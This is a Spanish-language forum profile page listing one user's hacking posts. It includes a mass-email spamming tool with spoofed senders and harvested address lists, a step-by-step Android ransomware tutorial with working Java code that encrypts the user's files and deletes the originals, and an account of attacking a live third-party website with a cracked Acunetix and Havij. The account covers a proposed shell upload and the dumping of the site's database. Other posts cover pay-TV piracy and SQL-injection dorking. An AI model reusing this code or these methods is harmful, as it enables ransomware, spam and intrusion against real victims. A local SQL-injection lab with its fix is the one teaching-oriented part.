Menú

Mostrar Mensajes

Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.

Mostrar Mensajes Menú

Mensajes - user_en1gm4

#41
HOLA COMPAÑER@S

Hoy les vengo a enseñar una herramienta que cree que nos permite enviar correos masivamente desde un servidor que tenga el servicio smtp instalado, casi todos lo tienen hasta los que son gratis, esta hecho en php, html5 y css .

primero descargamos la carpeta EmailSpammer que se encuentra aca:

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

y dentro de la misma descomprimimos el archivo ckeditor.tar.gz , les deben quedar estos 3 archivos dentro de la carpeta EmailSpammer si quieren pueden eliminar el arhivo comprimido


luego vamos a un servidor que nos servira para enviar los correos, puede ser uno gratuito como 000webhost y se registran con un correo fake o algun servidor que ya tengan por hay ;)

Bueno subimos la carpeta EmailSpammer a nuestro servidor  puede ser por ftp o como quieran y luego vamos a nuestroservidor/EmailSpammer


Listo ahora solo tenemos que tener una lista de correos, puede ser una que ya tengamos o pueden utilizar theHarvester para buscarlos, solo es instalarlo y por ejemplo para correos No tienes permitido ver los links. Registrarse o Entrar a mi cuenta seria algo asi: (estoy en debian hay que instalar theHarvester, kali linux ya lo trae por defecto)

python ./theHarvester.py -d No tienes permitido ver los links. Registrarse o Entrar a mi cuenta -l 500 -b google

y copiamos los correos a una hoja de texto y la guardamos como un archivo .txt

Luego solo colocan De: que vendria siendo quien envia el mensaje, el servidor lo enviara a nombre de ese correo, pueden poner el que quieran, seleccionan el archivo de texto con los correos(por ahora solo lee archivos de texto .txt)
colocan el asunto y luego llenan el mensaje, puede ser un mensaje con imagenes y todo bien bonito jaja, cuando ya lo tengan solo le dan enviar y listo el email estara enviado!

En la proxima actualizacion pondre que pueda leer archivos excel porque algunas bases de datos estan asi y serviria, saludos espero que les sirva de algo.

#42
HOLA COMPAÑER@S

Hace rato que no publicaba nada, estaba ocupado pero ya es hora de volver a lo que me gusta, esto de el pentesting, hoy les vengo a presentar HLuna un pack de herramientas que estoy desarrolando para sistemas linux, esta hecho en c++, por ahora solo cuenta con una herramienta, un generador de diccionarios para fuerza bruta, pero lo estare actualizando para asi agregar mas herramientas, les invito a que lo prueben da buenos resultados en cuanto a contraseñas wifi y logins basicos. (Probado en sistemas Debian y en Kali )


Bueno sin tanto rodeo les voy a enseñar como instalarlo
aca esta el github con el paso a paso por si acaso:
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Creamos una carpeta que se llame HLuna,

mkdir HLuna

Descargamos el archivo HLuna y lo pegamos dentro de esta carpeta, el archivo se encuentra aca  No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Luego damos permisos de ejecucion

chmod +x HLuna

y despues procedemos a correrlo

./HLuna

y listo muchachos,les saldra esto por consola


Trate de hacerlo lo mas intuitivo posible, aparece un menu, pulsan 1 para generar el diccionario

Luego nos preguntara cuantos palabras queremos generar, yo le puse 1024 para este ejemplo, pero todo depende de la compejitud de el diccionario


Luego nos pedira las palabras guias, estas son las palabras que el usuario creen que estaran en la contraseña seguidas de enter, por ejemplo:

administrador
admin
user
2017
usuario
acceso

Cuando ya tengamos todas pulsamos 0


Luego nos preguntara la ruta para guardar el diccionario por ejemplo /home/usuario/Escritorio/archivo.txt  aunque si colocan solo el nombre de el archivo por ejemplo diccionario.txt este lo generara en la ubicacion donde tengamos el archivo HLuna, en mi caso lo puse en el escritorio



y listo!, vamos a la ubicacion que pusimos anteriormente y ya estara nuestro diccionario creado



Pondre mas funcionalidades, apenas estoy empezando, espero les sirva, un gusto!!

EL CONOCIMIENTO ES LIBRE!




#43
Hola muchach@s! llevaba tiempo sin pasarme por aqui pero pues ya era hora de volver, esta vez les traigo un laboratorio que me arme para poder enseñar como se hace una injection sql manualmente, espero les guste.

Pueden montarlo en su propia maquina con un servidor local como xamp o wamp que ya tiene todo listo o a su propio servidor en internet, primero vamos a crear una base de datos MySql en nuestro servidor y crearemos una tabla llamada Clientes, el script quedaria algo asi:

CREATE TABLE `NOMBRE_BD`.`Clientes` ( `id` INT(2) NOT NULL AUTO_INCREMENT , `user` VARCHAR(30) NOT NULL , `password` VARCHAR(30) NOT NULL , `correo` VARCHAR(40) NOT NULL , `saldo` INT(3) NOT NULL , PRIMARY KEY (`id`)) ENGINE = InnoDB;

y se veria algo asi:


llenan la tabla con algunos datos.

Aca les dejo los archivos necesarios para subir al servidor:
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Despues de descargarlos abrimos los tres archivos .php que se descargaron el archivo index.php, registro.php,sqli.php y llenan los datos como USUARIO_BD, CONTRASEÑA_BD Y NOMBRE_BD, depende tengan configurada su base de datos, al terminar esto solo queda subir todos los archivos a una carpeta del servidor y listo!


Abrimos a nuestro navegador y nos dirimos a donde tengamos los archivos por ejemplo:

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Nos saldra un login, primero nos registramos y luego iniciamos sesion son los anteriores datos, y listo estaremos adentro
, ahora si a jugar:



INYECCION:


PRIMERO SE MIRA SI ES VULNERABLE

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta.com/taller_sql/sqli.php?id=1'


SE BUSCA EL NUMERO DE COLUMNAS DE LA TABLA

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta


SE MIRAN QUE CAMPOS CORRESPONDEN A QUE COLUMNA

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta


SE REVISA QUE VERSION DE BASE DE DATOS UTILIZA

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

SE PUEDE VER EL TIPO DE CODIFICACION UTILIZA

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

SE PUEDE OBTENER EL USUARIO CON EL QUE SE ESTA TRABJANDO LA BD

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

LISTA EL NUMERO DE TABLAS DE LA BD

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

"convertir el nombre de la tabla en hexadecimal" Clientes: 436c69656e746573

VAMOS A IMPRIMIR EL NOMBRE DE LAS COLUMNAS DE LA TABLA DE LA BASE DE DATOS

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Y LISTO AHORA SI PODEMOS OBTENER LOS DATOS

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

TODO ESTO LO PODEMOS HACER GRACIAS A QUE NO VALIDAMOS EL ID QUE NOS LLEGA POR LE METODO GET, CON UNA FUNCION QUE NOS LIMPIE ESTA VARIBALE LO PODEMOS ARREGLAR, SOLO DEBEMOS HACER ESTO EN LA LINEA 31 DE EL ARCHIVO SQLI.PHP TENEMOS QUE:

   $id =  $_GET["id"];

y a lo ultimo hay una funcionar que se llama limpiarString(), lo que tenemos que hacer es hacer que el id que obtenemos por get se limpie asi:

   $id =  limpiarString($_GET["id"]);

y listo, esta es una forma muy basica para detenerlo, php ya tiene unas funciones como htmlentities o htmlspecialchars, ustedes deciden.

LISTO AMIGOS SU PROPIO LABORATORIO DE SQL INJECTION, ESPERO QUE LES SIRVA,UN SALUDO!

#44
Hacking / CardSharing
Septiembre 03, 2017, 01:34:33 AM
Hola compañer@s, me parecio miy importante y creo que lo debo compartir, como ver tvs de paga y canales premium gratis!, hay que tener mucha paciencia pero se puede la tecnica se llama CardSharing aca un manual de el paso a paso y un video de la rooted donde hablan de esto

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta


#45
Hacking / Re:Obteniendo minutos gratis!, Colombia y otros
Septiembre 02, 2017, 08:38:39 PM
Por lo que eh visto solo funciona en Colombia.
#46
Que buen aporte, esto es lo que me gusta, hacking a la old school.
#47
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Hola!

Esta increible tu aporte! No había visto jamás un ransonware para Android. De hecho, jamás se me pasó por la cabeza hacer uno.
Mil gracias por compartirlo. Te he dejado +Karma!

Saludos,
ANTRAX

Habia leido algo sobre que wannacry habia llegado a android pero nunca supe si era verdad, quizas sea uno de los primeros programado en este lado de el planeta jaja, un gusto compartir, el conocimiento es libre.
#48
Hola compañer@s!

Quiero compartirles algo en lo que eh estado trabajando, este año se hablo mucho de los famosos rasonware, del ciber ataque mundial que sufrieron muchas empresas y demas, ps bueno, primero entendamos que es un rasonware y como opera.

Segun wikipedia:

CitarUn ransomware (del inglés ransom, 'rescate', y ware, por software) es un tipo de programa informático malintencionado que restringe el acceso a determinadas partes o archivos del sistema infectado, y pide un rescate a cambio de quitar esta restricción.1​ Algunos tipos de ransomware cifran los archivos del sistema operativo inutilizando el dispositivo y coaccionando al usuario a pagar el rescate.

En este tutorial les enseñare como crear un simple rasonware utilizando el algotirmo de encriptacion AES de 256 bytes, nos permitira encriptar archivos de texto, imagenes y musica.
Bueno y ps como me gusta todo este mundo quise hacerme el mio, pero no para hacer daño, quise hacerme el mio para demostrar de lo que podemos ser victimas o que tambien nos puede servir de ayuda(despues les explicare esta parte)

Antes que nada quiero decirles que este tutorial va dirigido a personas con conocimientos basicos en java y Android.

Comenzamos, primero abrimos Android Studio y creamos un nuevo proyecto, creamos un EmptyActivity con su respectiva clase, algo asi debe quedar:




Primero organizare la parte visual, voy a crear un EditText y dos Botones, uno para encriptar y otro para desencriptar, algo asi quedaria:

Código: java
<TextView
            android:id="@+id/textView4"
            android:layout_width="match_parent"
            android:layout_height="wrap_content"
            android:layout_gravity="center_vertical|center_horizontal|center"
            android:fontFamily="monospace"
            android:text="Contraseña"
            android:textSize="18sp" />

        <EditText
            android:id="@+id/clavesita"
            android:layout_width="match_parent"
            android:layout_height="wrap_content"
            android:ems="10"
            android:inputType="textPassword" />

        <Button
            android:id="@+id/boton1"
            android:layout_width="match_parent"
            android:layout_height="wrap_content"
            android:text="Encriptar" />

        <Button
            android:id="@+id/boton2"
            android:layout_width="match_parent"
            android:layout_height="wrap_content"
            android:text="Desencriptar" />



algo asi se veria:



Listo y aca empezamos con lo interesante, el codigo!
presten atencion a cada detalle que nombro, muchas 'cositas' me quitaron horas y horas, asi que cuidado

Primero hay que pedir permisos, ya que tengo un celular con Marshmallow (6), tengo que pedir los permisos tanto en el Manifest como en tiempo de ejecucion, nos vamos a la carpeta manifest, doble click al archivo AndroidManifest.xml y colocamos esto:


Código: java
<uses-permission android:name="android.permission.READ_EXTERNAL_STORAGE" />
<uses-permission android:name="android.permission.WRITE_EXTERNAL_STORAGE"/>



ahora vamos a la clase que creamos junto con el EmptyActivity, la mia se llama MainActivity, pedire los permisos en ejecucion:


Código: java
//Verificamos si ya tiene permisos

  if (ContextCompat.checkSelfPermission(this, Manifest.permission.READ_EXTERNAL_STORAGE) == PackageManager.PERMISSION_GRANTED
                && ContextCompat.checkSelfPermission(this, Manifest.permission.WRITE_EXTERNAL_STORAGE) == PackageManager.PERMISSION_GRANTED) {

  Toast.makeText(this, "La app ya tiene permisos", Toast.LENGTH_SHORT).show();

//Ya tenemos los permisos necesarios
//Podemos proceder a trabajar con la memoria de el celular

} else{

//Si no tenemos permisos, creare una funcion para pedirlos

PedirPermisos();

}



fuera del metodo OnCreate, definimos la funcion:

Código: java
public void PedirPermisos() {

        if (ActivityCompat.shouldShowRequestPermissionRationale(this, Manifest.permission.READ_EXTERNAL_STORAGE)) {

            Toast.makeText(this, "Se necesitan permisos", Toast.LENGTH_SHORT).show();
        }
        ActivityCompat.requestPermissions(this, new String[]{Manifest.permission.READ_EXTERNAL_STORAGE, Manifest.permission.WRITE_EXTERNAL_STORAGE},
                MY_PERMISSIONS_REQUEST);


    }



Para saber la respuesta de el usuario vamos a crear nuestra propia version de la funcion onRequestPermissionsResult que es la que nos dice si el usuario nos dio los permisos o no


Código: java
@Override
    public void onRequestPermissionsResult(int requestCode,
                                           String permissions[], int[] grantResults) {
        if (requestCode == MY_PERMISSIONS_REQUEST) {
            // If request is cancelled, the result arrays are empty.
            if (grantResults.length > 0
                    && grantResults[0] == PackageManager.PERMISSION_GRANTED && grantResults[1] == PackageManager.PERMISSION_GRANTED) {


                Toast.makeText(this, "La app ya tiene permisos", Toast.LENGTH_SHORT).show();


            } else {
                Toast.makeText(this, "SIN PERMISOS NO SE PUEDE EJECUTAR LA APP", Toast.LENGTH_SHORT).show();

            }
            return;
        }


    }



Algo asi les debe estar quedando



Luego voy a crear mi funcion de encriptar(), la cual necesita una clave de parametro, es la clave con la que vamos a cifrar los archivos, tiene que ser una clave de 16 bytes de tamaño, obligatoriamente!, yo utilizare esta = tr3D0ctaOlajESzU y una direccion, esta es la ubicacion de el archivo

Código: java
public void encriptar(String clave, String direccion, String nombre) throws IOException, NoSuchAlgorithmException, NoSuchPaddingException, InvalidKeyException {

        //Archivo de entrada(sin encriptar)

        File extStore = Environment.getExternalStorageDirectory();
        FileInputStream Entrada = new FileInputStream("/" + direccion);
       
       //Archivo de salida(encriptado) su nombre cambia quedaria guardado algo asi = encript_foto.jpg

        FileOutputStream Salida = new FileOutputStream(extStore + "/encript_" + nombre);

        // Tamaño de la key 16 bytes!
        SecretKeySpec sks = new SecretKeySpec(clave.getBytes(), "AES");
     
   // Se crea el Cipher, el encargado de cifrar los streams

        Cipher cipher = Cipher.getInstance("AES");
        cipher.init(Cipher.ENCRYPT_MODE, sks);

        // stream de salida, archivo de salida
        CipherOutputStream cos = new CipherOutputStream(Salida, cipher);
       
// Escribe bytes
        int b;
        byte[] d = new byte[8];
        while ((b = Entrada.read(d)) != -1) {
            cos.write(d, 0, b);
        }
       
      //Cierra los stream
        cos.flush();
        cos.close();
        Entrada.close();

        //Borra el archivo original
        File tmp = new File("/" + direccion);
        tmp.delete();

    }



y nuestra funcion desencriptar() , no la comentare porque hace casi lo mismo que la anterior

Código: java
public static void desencriptar(String clave, String direccion, String nombre) throws IOException, NoSuchAlgorithmException, NoSuchPaddingException, InvalidKeyException {

        File extStore = Environment.getExternalStorageDirectory();
        FileInputStream Entrada = new FileInputStream("/" + direccion);

        FileOutputStream Salida = new FileOutputStream(extStore + "/decrypt_" + nombre);
        SecretKeySpec sks = new SecretKeySpec(clave.getBytes(),
                "AES");
        Cipher cipher = Cipher.getInstance("AES");
        cipher.init(Cipher.DECRYPT_MODE, sks);
        CipherInputStream cis = new CipherInputStream(Entrada, cipher);
        int b;
        byte[] d = new byte[8];
        while ((b = cis.read(d)) != -1) {
            Salida.write(d, 0, b);
        }
        Salida.flush();
        Salida.close();
        cis.close();

        //Borra el archivo encriptado
        File tmp = new File("/" + direccion);
        tmp.delete();

    }



Listo ya tenemos nuestras funciones encargadas de cifrar los archivos, ahora necesitamos una funcion que valla por todas las carpetas del sistema buscando los archivos a encriptar, quedaria algo asi:

Código: java
public static ArrayList<File> EncontrarArchivos(File root) {
        ArrayList<File> Archivos = new ArrayList<File>();
        File[] _archivos = root.listFiles();
        if (_archivos != null) {
            for (File lista : _archivos) {
                if (lista.isDirectory() && !lista.isHidden()) {

                    Archivos.addAll(EncontrarArchivos(lista));
                } else {

                     //Solo permitimos archivos que terminen en . txt .jpg .jpeg y .mp3

                    if (lista.getName().endsWith(".txt") || lista.getName().endsWith(".jpg") || lista.getName().endsWith(".jpeg") ||
                  lista.getName().endsWith(".png") || lista.getName().endsWith(".mp3")) {
                        if (lista.getTotalSpace() > 3) {

                        //Si termina en lo que queremos y pesa mas de 3 kb lo agregamos a la lista

                            Archivos.add(lista);
                        }
                    }
                }
            }
        }
        return Archivos;
    }



Bueno basicamente ya tenemos nuestras principales funciones ya listas, ahora programaremos que al hacer click sobre el boton encriptar, ejecute nuestra funcion encriptar con los archivos que encontro en el sistema

Como ya lo habia dicho antes, despues de que comprobamos los permisos esque podemos realizar las tareas, vamos a utilizar el codigo anterior donde verificamos los permisos y habilitamos un OnClickListener para cada boton que creamos, asi este al ser oprimido ejecutara lo que le digamos, quedaria algo asi:

Código: java
    //PIDE Y COMPRUEBA PERMISOS EN EJECUCION

        if (ContextCompat.checkSelfPermission(this, Manifest.permission.READ_EXTERNAL_STORAGE) == PackageManager.PERMISSION_GRANTED
                && ContextCompat.checkSelfPermission(this, Manifest.permission.WRITE_EXTERNAL_STORAGE) == PackageManager.PERMISSION_GRANTED) {

            //Referencia botones y demas
            final Button BotonEncriptar = (Button) findViewById(R.id.boton1);
            final Button BotonDesencriptar = (Button) findViewById(R.id.boton2);
            final EditText EntradaClave = (EditText) findViewById(R.id.clavesita);


            Toast.makeText(this, "La app ya tiene permisos", Toast.LENGTH_SHORT).show();

            BotonDesencriptar.setOnClickListener(new View.OnClickListener() {
                [b]@[url=https://underc0de.org/foro/index.php?action=profile;u=8340]Override[/url][/b]
                public void onClick(View view) {


                    try {

                              //Lista de archivos encontrados en el sistema

                        final ArrayList<File> Archivos = EncontrarArchivos(Environment.getExternalStorageDirectory());

                        for (int i = 0; i < Archivos.size(); i++) {

                             //los mandamos a desenciptar 1 x 1, pasandole el nombre del archivo y su ubicacion, pero primero
                             // revisamos si esta encriptado, (que en su nombre tenga la palabra "encript_"

                             int comprobacion = Archivos.get(i).getName().indexOf("encript_");
                            if (comprobacion != -1) {

                                desencriptar(clave, Archivos.get(i).getPath(), Archivos.get(i).getName());

                            }
                            }

                        }

                              //Excepciones necesarias para la funcion de encriptar

                    } catch (IOException | NoSuchAlgorithmException | NoSuchPaddingException | InvalidKeyException k) {
                        k.printStackTrace();
                    }
                }
            });


            BotonEncriptar.setOnClickListener(new View.OnClickListener() {
                [b]@[url=https://underc0de.org/foro/index.php?action=profile;u=8340]Override[/url][/b]
                public void onClick(View view) {


                    try {


                        final ArrayList<File> Archivos = EncontrarArchivos(Environment.getExternalStorageDirectory());

                        for (int i = 0; i < Archivos.size(); i++) {
                         
     //los mandamos a encriptar 1 x 1, pasandole el nombre del archivo y su ubicacion

                            encriptar(clave, Archivos.get(i).getPath(), Archivos.get(i).getName());

                       


                    } catch (IOException | NoSuchAlgorithmException | NoSuchPaddingException | InvalidKeyException k) {

                        k.printStackTrace();

                    }

                }
            });

        } else {

            PedirPermisos();
        }

    }


Asi nos aseguramos a que sin los permisos necesarios nunca intentara encriptar los archivos y que nos genere errores, listo nuestro rasonware ya esta casi terminado, solo tenemos que leer la clave que nos ingresen para desencriptar o encriptar, con el EditText se la pedimos al usuario y la leemos:

Código: java
//Referenciamos nuestro objetos en pantalla

final Button BotonEncriptar = (Button) findViewById(R.id.boton1);
            final Button BotonDesencriptar = (Button) findViewById(R.id.boton2);
            final EditText EntradaClave = (EditText) findViewById(R.id.clavesita);



y luego la leemos:

Código: java
String clave = EntradaClave.getText().toString();


esto va dentro de el OnClickListener de el boton encriptar para que al momento de que lo presionen la lea y haga sus respectivas tareas, Listo muchachos! asi se hace un rasonware para android.

Ahora construyamos nuestra apk y vamos a instalarla en nuestro movil, aca unas fotos de su funcionamiento, voy a crear una carpeta llamada docs y dentro de ella guardare una archivo de texto, una cancion y una imagen:



Ahora ire a la aplicacion y le dare sobre el boton encriptar, veamos que pasa:

se han encriptado los archivos de mi memoria, al tratar de abrir la imagen no me deja:




Ahora volvere a la aplicacion y le dare en desenciptar:


Mis archivos vuelven a la normalidad, puedo ver mi imagen, fijensen en los nombres, quiere decir que paso por todos nuestros procesos

Ahora podemos crear otra funcion que al terminar de encriptar los archivos no envie la clave y el id del celular a nuestro servidor para que quede alli guardada, no quise meter eso en el tutorial ya que pienso que quizas lo utilizen para mal, de ese modo podrian pedir dinero para darles las clave y .....
Pero aca otra parte, porque no utilizamos esto de una buena forma? si encriptamos nuestros archivos con una clave que solo nosotros sepamos y los desencriptamos solo cuando los necesitemos? no puedo decir que tendrias 100% de privacidad pero si le dificultaria el trabajo a cualquier cracker que quiera robarle su informacion.

cuidado con esto, no es algo para jugar y si van a hacer pruebas haganlo en ambientes controlados, mientras hacia esto me toco formatear mi celular ya que todos mis archivos quedaron encriptados xd, asi que cuidado, los archivos que lee son de la memoria interna del telefono, no se porque pasa esto pero solo me reconoce los de la memoria interna, tambien cuando le opriman sobre encriptar, desencriptar esperar unos segundos hasta que el celular este normal, si minimizamos la aplicacion o la cerramos de una podria generar errores

Les dejare la aplicacion y el codigo, espero les halla gustado, yo aprendi bastante haciendolo espero ustedes tambien
Aca el codigo y la app lista para que la prueben

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

No se preocupen si descargnn la app a su celular, no hara nada hasta que no opriman los botones encriptar y luego con el de desencriptar todo volvera a la normalidad, es mas bien como educativo, no corran.

Ayer murio el vocalista de Linkin Park, Chester Bennington, sus canciones me acompañaron mientras programaba y en mi dia a dia, quise hacer este tutorial en homenaje a  él, Grande Chester Bennington!!, tus fans nunca te olvidaremos.

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta



(perdon por la ortografia no soy muy bueno con las palabras)

Un saludo y gusto en compartir!
#49
Muy interesante el post, creo que ahora mas que nunca sabemos que las piramides no funcionan, que las redes y comunidades que trabajan juntas si, es lo que debemos empezar a hacer, unirnos todos contra aquellos que quieren estar arriba de nosotros.
#50
Buen post! ,me podrias decir como entraste a la bd de la pagina?, trate por sql y no me dejo, envie algunos comandos xss converitidos a codigo asccii y tampoco.
#51
Underc0de / Re:Te gustaria ser Tutor?
Julio 13, 2017, 07:05:48 PM
Me gustaria ser tutor, publique un articulo en la seccion de hacking y me dieron -1,no se porque jaja pero pues me gustaria, aca esta el articulo que ya publique:

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

se sobre seguirdad web, pentesting, programacion en java,php y c#

un saludo.
#52
Asi es, creo que en esta publicacion no podria explicarlas todas, gracias por el dato.
#53
Hola compañer@s, hoy vengo a mostrarles un programita que me acabe de bajar y me ah parecido muy util a la hora de hacer pruebas de seguridad a nivel de paginas web, se trata de Acunetix, hasta ahora empiezo a mirarlo pero lo que se esque me da un analisis completo de todo el servidor de la pagina, ubicaciones dentro del servidor, cookies, peticiones get y post, ademas nos muestra su estructura interna (algo que nos servira mas adelante), tambien permite hacer injecciones sql, editar cabeceras http, sniffear y bueno en fin, se que tiene muchas mas cosas pero por ahora solo utilizaremos algunas de estas.

Antes que nada quiero mencionar que este programa es compatible con windows, asi que realizare todo el tutorial en este sistema operativo(si, si ya se pero aveces hay que acostumbrarse a usar lo que se tenga a la mano), mas que todo quiero explicar el vector de ataque, ustedes podran hacer el ataque con la herramienta que mas les guste o a mano, a lo hardcore! jaja

Aca un screenshot de el programa




Link del programa:

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

El programa lo encontre en internet la verdad yo solo lo comparto, les recomiendo que si quieren lo examinen con un antivirus
es facil de instalar, dentro de la carpeta estan las instruccion en ingles,les explicare brevemente
Descargan el archivo, lo descomprimen y les va a quedar una carpeta con 4 archivos adentro, hay esta el tutorial dentro de esas cosas, instalan el programa  2017_03_17_00_webvulnscan112.exe y luego se dirigen a la carpeta donde quedo instalado el programa por lo general en el disco local C: dentro de Archivos de programa/Acunetix, pegan el Activation.exe y el keygen que estan la carpeta descargada y lo pegan dentro, luego abren el icono Acunetix Web Vulnerability Scanner 10.5 que les quedo en el escritorio como administrador  y les va a salir un formulario de registro, donde dice key colocan un espacio,(asi es un espacio y ya), colocan este correo [email protected]  y este telefono 0654321234 , lo demas se deja en blanco y se la da siguiente, les saldra una o dos ventanas, le dan ok a la primera y cancel a la segunda o cancel a las dos como queiran xd y listo saldra un error y el programa abrira solo (si tienen dudas o algo mas en la carpeta estan las instrucciones en ingles)

Bueno dejando ya los aspectos tecnicos a un lado pongamonos a jugar un poco con esto, cuando tengan el programa abierto, les pedira si quieren iniciar un nuevo scan y le dan que si, siguiente y luego ponen un target, osea la pagina web que quieren y listo, empezara automaticamente a escanear toda la web, hasta el fondo!


Aca un screenshot de lo que nos muestra, su estructura como anteriormente lo dije,sus peticiones get/post ,informacion del servidor y muchas cositas mas



Bueno y aca empieza lo emocionante, podemos analizar toda esta informacion que nos muestra este programa, para poder intentar vulnerar la pagina, una vulnerabilidad que ya es conocida por muchos esque si el servidor de la web deja acceder a sus carpetas, sin filtros y sin nada, podemos ir por el servidor buscando lo que queramos, pdfs,imagenes,documentos bueno en fin todo lo que esta alli ahora es accesible, tambien se pueden utilizar su mismo codigo en contra de ellos, asi es!
Por ejemplo si encontramos el archivo .php/.json... que se encarga que subir imagenes, texto o solamente hacer peticiones al servidor, ya tenemos medio mundo ganado!, y como es el caso la pagina web que estoy examinando lo tiene, buscando entre su estructura halle el siguiente link:

http://www.xxxxxx/xxxxxx/load-styles.php?c=1

Listo, lo primero que pude notar fue que enviaba una variable con el nombre "c" por medio del metodo get, listo asi que hize mis pruebas y si!, acceptaba los parametros que yo le envie, ya se que andan un poco confundidos pero mirenlo de esta manera, si esa funcion .php que encuentran se les puede enviar parametros y este los sube al servidor, (ya se que pensaron en una shell) y si, asi podriamos subir una shell al servidor por medio de su mismo codigo, si por ejemplo encontramos un archivo llamado upload-imagen.php podriamos enviarle una shell, si no tiene filtros o son pocos, cambiandole el nombre shell.php.jpg o bueno yo se que la mayoria tiene sus tacticas, tambien podria ser si permite el envio de archivos de texto,pdf, etc.

Y como les contaba anteriormente encontre en la web un archivo .php  que me permitio enviar parametros que el servidor interpreto, para eso utilize un extencion de google chrome llamada Postman, yo se que mas de uno la ah utilizado, bueno con esta extencion enviar parametros get y post  es muy facil sin necesidad de que instalemos un servidor local y bueno ustedes ya saben, esta extension nos permite enviar String/integer,imagenes,archivos.php, archivos de texto y todo tipo de parametros, es muy facil de usar solo colocan la direccion a la que quieeren hacer la consulta  en mi caso:

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta


Busque en informacion sobre el codigo de esta funcion que esta en el servidor, es la funcion que wordpress utiliza para subir y cambiar los estilos de la web, en este pedaso de codigo podemos ver que recibe tres variables.

Aca el codigo completo

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta



/*

$load = $_GET['load'];

codigo
codigo....

$compress = ( isset($_GET['c']) && $_GET['c'] );
$force_gzip = ( $compress && 'gzip' == $_GET['c'] );
$rtl = ( isset($_GET['dir']) && 'rtl' == $_GET['dir'] );



*/

una variable con el nombre "load" ,otra con el nombre "c" y la ultima de nombre "dir", si el servidor me recibe los parametros puedo cambiar cosas de la pagina sin su permiso, mas adelante seguire escribiendo acerca de como hacer esto.

Siguiendo con lo de Postman, en la izquiera escogen metodo GET , dan click en params,colocan el nombre de la variable, en mi caso "c" como se ve en el link encontrado y el valor que quiera enviarle, me devolvio 200 OK, lo que queria, me recibio el parametro.


Aca un screenshot, si es por el metodo post podrian enviar imagenes, .php lo que ya dije y tendrian por ejemplo una shell activa en el servidor





Bueno eso es una parte de lo que se podria llegar hacer, tambien podriamos utilizar las ya conocidas injecciones sql para obtener su base de datos! y pues examinando toda la informacion que me mostraba este programa di con un link que parece vulnerable:


No tienes permitido ver los links. Registrarse o Entrar a mi cuenta


Bueno y pues como la curiosidad mato al gato, tenia que testearlo, lo intente hacer con este programa directamente pero note que consume mucha capacidad en el equipo y es algo mas largo que hacerlo con un viejo amigo, havij (claro pueden hacerlo manualmente si quieren, ustedes saben mas que yo jaja) y bueno lo descargan, ese si no tengo el link pero en internet lo encuentran xd

Cuando tengan havij instalado pueden configurar el tipo de metodo que utilizar,parametro a enviar o dejar todo en automatico, colocan el link sospechoso y le dan Analize, y si! era vulnerable (claro yo lo probe manualmente enviando la comilla ' eso no pasa de moda) y listo lo siguiente fue obtener su base de datos (yo tambien quede como que wtf con el nombre de esa bd y sus tablas)



Listo muchach@s, conseguimos vulnerar la seguridad de la pagina web con un poco de ingenio y utilizando estas herramientas, mas que todo les quiero mostrar el vector de ataque que puede llevar a cabo en fin las herramientas son lo de menos.

Un resumen para los que ya saben de todo esto seria, hacerse con la estructura de la web, peticiones y todo su funcionamiento, buscar dentro de su servidor los archivos de programacion que utiliza esta para su funcionamiento, logar enviar nuestros parametros a esos archivos y que estos lo reciban, mirar peticiones sospechosas que se realizan por dentro de la web que nos serviria para hacer injecciones sql asi como xss si es el caso.

Esto es todo, un poco largo pero ps no podia dormir y quise compartirlo con ustedes, no lo hago para que empiezan a "juackear" cuanta web vulnerable ven por hay lo comparto para que sepan lo que se puede llegar hacer si no se ponen permisos a las carpetas del servidor, no se filtran las peticiones, no se encrypta el trafico, y para su uso personal, para cuando desarrollen sus paginas web tengan todo esto en cuenta!






Un saludo y un gusto compartir!
[/b]






#54
Hacking / Re:Sql Injeccion con Google Dorks
Julio 10, 2017, 07:48:42 PM
Asi es, se podrian hacer busquedas mas especificas, solo queria mostrar lo que se puede hacer, el resto se los dejo a su imaginacion.
#55
Hacking / Sql Injeccion con Google Dorks
Julio 10, 2017, 12:48:01 AM
Hola compañer@s, hoy vengo a compartirles algo que se que la mayoria ya sabe y que yo creia ya inutil, pero no es asi, se trata de utilizar busquedas personalizadas de google para encontrar links directos que nos lleven a un error, digamos una consulta sql que se hace mediante un id el cual llega mediante el metodo get y es visible para el usuario, ps basicamente es esto

explicare brevemente en que consiste la vulnerabilidad para los que no saben, cuando se hace la consulta nombrada anteriormente la pagina busca en su base de datos el id que obtiene por medio de la url (metodo get), el campo id que esta creado en la bd tiene como tipo integer ,  osea solo acepta tipos de id que sean numeros, pero que tal si le enviamos digamos una comilla ' , nos generara un error como este:

[SQL ERROR] You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near 'asc' at lin

gracias a esto se pueden hacer consultas a la base de datos sin ninguna restriccion y obtener sus datos, por eso los desarrolladores web tienen que tener muy en cuenta estos casos ala hora de mandar parametros entre paginas y mas si estos no tienen filtros, asi lo evitarian, esto es algo muy viejo pero que todavia sirve, ademas tambien se pueden hacer injecciones por el metodo post.

ya con el error generado el siguiente paso seria explotar la vulnerabilidad, lo podemos hacer manualmente enviando los parametros por la url si se tiene conocimiento o hay algunos programas que automatizan este proceso como havij(windows) o sqlmap(linux).

sin tanta parla aqui les dejo el dork y algunos pantallasos de que todavia sirve
